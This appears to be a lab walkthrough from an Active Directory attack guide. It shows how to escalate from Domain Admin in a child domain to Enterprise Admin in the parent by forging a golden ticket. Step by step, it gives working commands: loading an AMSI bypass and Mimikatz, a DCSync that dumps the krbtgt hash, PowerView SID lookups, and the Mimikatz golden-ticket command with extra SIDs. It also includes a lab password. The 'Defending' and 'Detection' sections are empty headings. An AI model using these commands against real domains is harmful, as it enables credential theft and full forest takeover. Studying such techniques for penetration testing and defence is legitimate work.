Krbtgt hash

Attacking

How it works

Once you gain Domain Admin privileges within the child domain its possible to get Enterprise Admin in the parent domain by generating a golden ticket in the child domain with the SID of the Enterprise Admin group.

Tools

• MimiKatz

• PowerView

Executing the attack

The attack is executed from the perspective of already gaining domain admin privileges. This is done in the unconstrained delegation section:

Unconstrained Delegation

1. For easy execution, login on WS01 as the Administrator user with the password Welcome01!.

2. Start PowerShell as Administrator and load a amsi bypass and MimiKatz into memory.

To execute the attack we need a couple bits of information:

• The hash of the krbtgt user.

• The SID of the Enterprise Admins group.

• The SID of the child domain.

3. Execute a DCsync with MimiKatz and only retrieve the krbtgt hash:

Invoke-MimiKatz -Command '"lsadump::dcsync /user:amsterdam\krbtgt /domain:amsterdam.bank.local"'

4. Retrieve the SID of the enterprise Admins group, using PowerView:

Get-DomainGroup "Enterprise Admins" -Domain bank.local | Select-Object samaccountname, objectsid

5. Retrieve the domain SID from the child domain, using PowerView:

Get-DomainSID

6. Create a golden ticket with MimiKatz and inject it into the current session:

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<FQDN CHILD DOMAIN> /sid:<CHILD DOMAIN SID> /krbtgt:<HASH> /sids:<SIDS OF ENTERPRISE ADMIN GROUP OF TARGET> /ptt"'

7. The ticket injected successfully, now we can dir the c$ directory to check if our user has read/write access to the C disk:

Defending

Detection

References

nishang/Gather/Invoke-Mimikatz.ps1 at master · samratashok/nishangGitHub